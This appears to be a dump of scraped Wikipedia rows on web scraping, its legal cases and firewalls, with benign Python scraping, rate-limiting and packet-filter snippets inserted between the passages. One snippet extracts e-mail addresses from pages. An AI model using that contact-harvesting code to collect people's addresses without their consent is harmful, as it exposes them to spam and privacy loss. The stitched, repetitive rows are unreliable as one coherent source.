techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
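The fetch-then-extract workflow described above can be shown with the same requests, BeautifulSoup, and pandas libraries this notebook already uses. A minimal sketch; https://example.com and links.csv are placeholders:
import requests
import pandas as pd
from bs4 import BeautifulSoup

# Fetch the page (the downloading step), then extract data from the parsed HTML.
response = requests.get("https://example.com", timeout=10)
response.raise_for_status()
soup = BeautifulSoup(response.text, "html.parser")

print("Page title:", soup.title.string if soup.title else None)

# Copy the extracted data into a spreadsheet-style file for later analysis.
rows = [{"text": a.get_text(strip=True), "href": a["href"]}
        for a in soup.find_all("a", href=True)]
pd.DataFrame(rows).to_csv("links.csv", index=False)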
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
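Two of the techniques described above, grep-style regular-expression matching and DOM parsing with XPath, can be sketched as follows. The URL is a placeholder, the e-mail pattern is deliberately simple, and the third-party lxml package is assumed to be installed:
import re
import requests
from lxml import html

page = requests.get("https://example.com", timeout=10).text

# 1) Regular-expression matching: pull out anything that looks like an e-mail address.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", page)
print(emails)

# 2) DOM parsing: build a tree and query it with XPath for all link targets.
tree = html.fromstring(page)
print(tree.xpath("//a/@href"))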
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
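As an example of the framework-style tools listed earlier in this passage (Scrapy among them), a minimal spider might look like the sketch below. The target is the public practice site quotes.toscrape.com used in Scrapy's own tutorial, not a site from this document:
import scrapy

class QuotesSpider(scrapy.Spider):
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        # Extract each quote and its author from the listing page.
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow the pagination link, if present.
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)

# Run with:  scrapy runspider quotes_spider.py -o quotes.json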
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" to Southwest's site, and that it also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, arguing that the prevailing law in this case should be US copyright law and that, under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked its IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore the emerging pattern that the courts are prepared to protect proprietary content on commercial sites from uses that are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed favored common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which remanded it to the Ninth Circuit for reconsideration in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by the portal site ofir.dk of the real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to constitute a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
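As a purely illustrative sketch of one such administrative measure (not taken from the source text), the snippet below implements a toy per-IP rate limiter of the kind a site operator might use to slow a bot; the window length, request budget, and IP address are arbitrary example values.

# Toy per-IP sliding-window rate limiter (illustrative values only).
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60    # sliding-window length (arbitrary example value)
MAX_REQUESTS = 100     # requests allowed per IP within one window (arbitrary)
_recent_hits = defaultdict(deque)  # maps ip -> timestamps of recent requests

def allow_request(ip, now=None):
    """Return True if a request from `ip` stays within the rate limit."""
    now = time.time() if now is None else now
    window = _recent_hits[ip]
    # discard timestamps that have fallen out of the sliding window
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    if len(window) >= MAX_REQUESTS:
        return False  # the server would throttle or block this client
    window.append(now)
    return True

# Example: the 101st request inside a single window is rejected
for _ in range(101):
    allowed = allow_request("203.0.113.7")
print(allowed)  # False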
673 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Firewall_(computing) | In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. 1 2 A firewall typically establishes a barrier between a trusted network and an untrusted network, such as the Internet. 3 The term firewall originally referred to a wall intended to confine a fire within a line of adjacent buildings. 4 Later uses refer to similar structures, such as the metal sheet separating the engine compartment of a vehicle or aircraft from the passenger compartment. The term was applied in the 1980s to network technology 5 that emerged when the Internet was fairly new in terms of its global use and connectivity. 6 The predecessors to firewalls for network security were routers used in the 1980s. Because they already segregated networks, routers could apply filtering to packets crossing them. 7 Before it was used in real-life computing, the term appeared in the 1983 computer-hacking movie WarGames, and possibly inspired its later use. 8 One of the earliest commercially successful firewall and network address translation (NAT) products was the PIX (Private Internet eXchange) Firewall, invented in 1994 by Network Translation Inc., a startup founded and run by John Mayes. The PIX Firewall technology was coded by Brantley Coile as a consultant software developer. 9 Recognizing the emerging IPv4 address depletion problem, they designed the PIX to enable organizations to securely connect private networks to the public internet using a limited number of registered IP addresses. The innovative PIX solution quickly gained industry acclaim, earning the prestigious "Hot Product of the Year" award from Data Communications Magazine in January 1995. Cisco Systems, seeking to expand into the rapidly growing network security market, subsequently acquired Network Translation Inc. in November 1995 to obtain the rights to the PIX technology. The PIX became one of Cisco's flagship firewall product lines before eventually being succeeded by the Adaptive Security Appliance (ASA) platform introduced in 2005. Firewalls are categorized as a network-based or a host-based system. Network-based firewalls are positioned between two or more networks, typically between the local area network (LAN) and wide area network (WAN), 10 their basic function being to control the flow of data between connected networks. They are either a software appliance running on general-purpose hardware, a hardware appliance running on special-purpose hardware, or a virtual appliance running on a virtual host controlled by a hypervisor. Firewall appliances may also offer non-firewall functionality, such as DHCP 11 12 or VPN 13 services. Host-based firewalls are deployed directly on the host itself to control network traffic or other computing resources. 14 15 This can be a daemon or service as a part of the operating system or an agent application for protection. The first reported type of network firewall is called a packet filter, which inspects packets transferred between computers. The firewall maintains an access-control list which dictates what packets will be looked at and what action should be applied, if any, with the default action set to silent discard. Three basic actions regarding the packet consist of a silent discard, discard with Internet Control Message Protocol or TCP reset response to the sender, and forward to the next hop. 
16 Packets may be filtered by source and destination IP addresses, protocol, or source and destination ports. The bulk of Internet communication in the 20th and early 21st centuries used either the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) in conjunction with well-known ports, enabling firewalls of that era to distinguish between specific types of traffic such as web browsing, remote printing, email transmission, and file transfers. 17 18 The first paper published on firewall technology appeared in 1987, when engineers from Digital Equipment Corporation (DEC) developed filter systems known as packet filter firewalls. At AT&T Bell Labs, Bill Cheswick and Steve Bellovin continued their research in packet filtering and developed a working model for their own company based on their original first-generation architecture. 19 In 1992, Steven McCanne and Van Jacobson released a paper on the BSD Packet Filter (BPF) while at Lawrence Berkeley Laboratory. 20 21 From 1989 to 1990, three colleagues from AT&T Bell Laboratories, Dave Presotto, Janardan Sharma, and Kshitij Nigam, developed the second generation of firewalls, calling them circuit-level gateways. 22 Second-generation firewalls perform the work of their first-generation predecessors but also maintain knowledge of specific conversations between endpoints by remembering which port numbers the two IP addresses are using at layer 4 (the transport layer) of the OSI model for their conversation, allowing examination of the overall exchange between the nodes. 23 Marcus Ranum, Wei Xu, and Peter Churchyard released an application firewall known as the Firewall Toolkit (FWTK) in October 1993. 24 This became the basis for the Gauntlet firewall at Trusted Information Systems. 25 26 The key benefit of application-layer filtering is that it can understand certain applications and protocols such as File Transfer Protocol (FTP), Domain Name System (DNS), or Hypertext Transfer Protocol (HTTP). This allows it to identify unwanted applications or services using a non-standard port, or to detect if an allowed protocol is being abused. 27 It can also provide unified security management, including enforced encrypted DNS and virtual private networking. 28 29 30 As of 2012, the next-generation firewall provides a wider range of inspection at the application layer, extending deep packet inspection functionality. Endpoint-based application firewalls function by determining whether a process should accept any given connection. Application firewalls filter connections by examining the process ID of data packets against a rule set for the local process involved in the data transmission. Application firewalls accomplish their function by hooking into socket calls to filter the connections between the application layer and the lower layers. Application firewalls that hook into socket calls are also referred to as socket filters. Firewall logging commonly covers traffic logs, threat prevention logs, audit logs, event logs, session logs, DDoS mitigation logs, geo-location logs, URL filtering logs, user activity logs, VPN logs, system logs, and compliance logs. Setting up a firewall is a complex and error-prone task. A network may face security issues due to configuration errors. 32 Firewall policy configuration is based on the specific network type (e.g., public or private) and can be set up using firewall rules that either block or allow access to prevent potential attacks from hackers or malware. 33 |
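To illustrate the access-control-list idea described above, here is a hedged, toy sketch of a first-match packet filter in Python with silent discard as the default action; the rules, networks, and ports are invented for the example, and this is not how a production firewall is implemented.

# Toy first-match packet filter over an access-control list; default action is silent discard.
import ipaddress

# Each rule: (action, source CIDR, destination CIDR, protocol, destination port or None for "any")
ACL = [
    ("forward", "10.0.0.0/8",   "0.0.0.0/0",  "tcp", 443),   # allow outbound HTTPS from the LAN
    ("reject",  "0.0.0.0/0",    "10.0.0.0/8", "tcp", 23),    # reject inbound telnet with a TCP reset
    ("forward", "192.0.2.0/24", "10.0.0.0/8", "udp", None),  # allow any UDP from a partner network
]

def filter_packet(src_ip, dst_ip, proto, dst_port):
    """Return the action for a packet: 'forward', 'reject', or 'discard' (silent default)."""
    for action, src_net, dst_net, rule_proto, rule_port in ACL:
        if (ipaddress.ip_address(src_ip) in ipaddress.ip_network(src_net)
                and ipaddress.ip_address(dst_ip) in ipaddress.ip_network(dst_net)
                and proto == rule_proto
                and (rule_port is None or dst_port == rule_port)):
            return action
    return "discard"  # no rule matched: drop the packet silently

print(filter_packet("10.1.2.3", "93.184.216.34", "tcp", 443))  # forward
print(filter_packet("198.51.100.9", "10.1.2.3", "tcp", 23))    # reject
print(filter_packet("198.51.100.9", "10.1.2.3", "tcp", 80))    # discard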
675 | https://en.wikipedia.org/wiki/Web_scraping | https://it.wikipedia.org/wiki/Web_scraping | Web scraping (also called web harvesting or web data extraction) is a computing technique for extracting data from a website by means of software programs. Such programs usually simulate human browsing of the World Wide Web using the Hypertext Transfer Protocol (HTTP) or a browser such as Internet Explorer or Mozilla Firefox. Closely related to web indexing, this technique is applied through bots by most search engines. Web scraping, by contrast, focuses more on transforming unstructured data found on the web, usually in HTML format, into metadata that can be stored and analyzed locally in a database. Web harvesting is also related to web automation, the simulation of human browsing by means of computer software. Some websites use methods to prevent web scraping, for example by detecting bots and blocking them from viewing their pages. To work around this, there are web scraping systems that rely on techniques such as DOM parsing, computer vision, and natural language processing to simulate human browsing; these techniques make it possible to collect the contents of web pages for offline analysis. 1 Web scraping can be used to compare prices online, monitor weather data, detect changes to a website, support scientific research, and enable web mashups and web data integration. Web scraping is the process of extracting or collecting data from the World Wide Web; once obtained, these data can be used for a variety of purposes. The techniques that can be used depend on the means and resources available, ranging from so-called ad hoc solutions, which require human intervention to select the useful information, to fully automated systems that use machine learning to relieve the user of some tasks. Sometimes even the best web scraping technique cannot replace a human's manual examination and copy-and-paste, and in some cases this is the only workable solution, since some web pages prevent the automatic collection of data. There are various software tools that can automatically recognize the structure of a web page, with no human intervention required for data extraction; some of them can extract information directly from APIs. Many websites consist of automatically generated pages whose information comes mostly from large databases. Data belonging to similar categories are organized into common pages or templates so that they can be retrieved more easily. Software that detects these templates in order to extract data of the same type is called a wrapper. Using a combination of machine learning and computer vision, techniques are being developed that analyze and extract data from web pages by following human-like models, thereby simulating the behavior of a real user. In this way, the work required of web scraping software is reduced and more relevant information is obtained. 
To modify or inspect a web page, client-side scripts are analyzed and then organized into a DOM tree. The DOM is used mainly to retrieve information from documents with a non-standard structure, that is, where elements occur in arbitrary positions. Finally, through a full web browser, the tree can be queried and information retrieved from it. Most web pages contain semantic annotations (or markup) and metadata that can easily be found and used to locate specific data snippets. This may be a simple case of DOM parsing if the metadata is embedded only in the web page; otherwise, the annotations, organized into separate layers, are stored and managed apart from the web pages, so that scrapers can retrieve the instructions and data from this layer before scraping the pages. Several companies have developed vertical-specific harvesting platforms. They create and monitor a multitude of bots for specific verticals, with no human in the loop (no direct human involvement) and no work tied to a specific site. The robustness of a platform is measured by the quality of the information it retrieves (number of fields) and by its scalability (how quickly it can scale from hundreds to thousands of sites). This scalability is most often used to target the long tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. A simple but effective approach for extracting information from web pages is the grep command on UNIX systems, or the regular-expression-matching functions of programming languages (for example Perl or Python). Web scraping is a technique that allows information to be extracted from websites; it often involves transforming unstructured web page data into a database for analysis or re-use of the content. The re-use may take place on the website from which the information was retrieved or in commercial operations. In most cases bots, which make up 46% of web traffic, are deployed by individuals to perform web scraping at a far higher rate than humans could ever achieve. Analyzing the main web scraping platforms and services, Distil Networks pointed out how the democratization of web scraping allows users to steal sensitive information on the web with ease: "If your content can be viewed on the web, it can be scraped." 2 Thirty-eight percent of companies that engage in web scraping do so to obtain content, since the easily acquired mass of data enables a wide range of operations such as price comparison, weather data monitoring, and various kinds of research. Web scraping services cost as little as 3.33 per hour, and an average web scraping project costs around 135. The average web scraper earns 58,000 per year, while working at a medium-to-large company specializing in web scraping can bring in up to 128,000 per year. 3 The administrator of a website can use various methods to slow down or stop a bot. 
Some of these are: These are some of the software tools available for customizing web scraping solutions: |
677 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-26 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
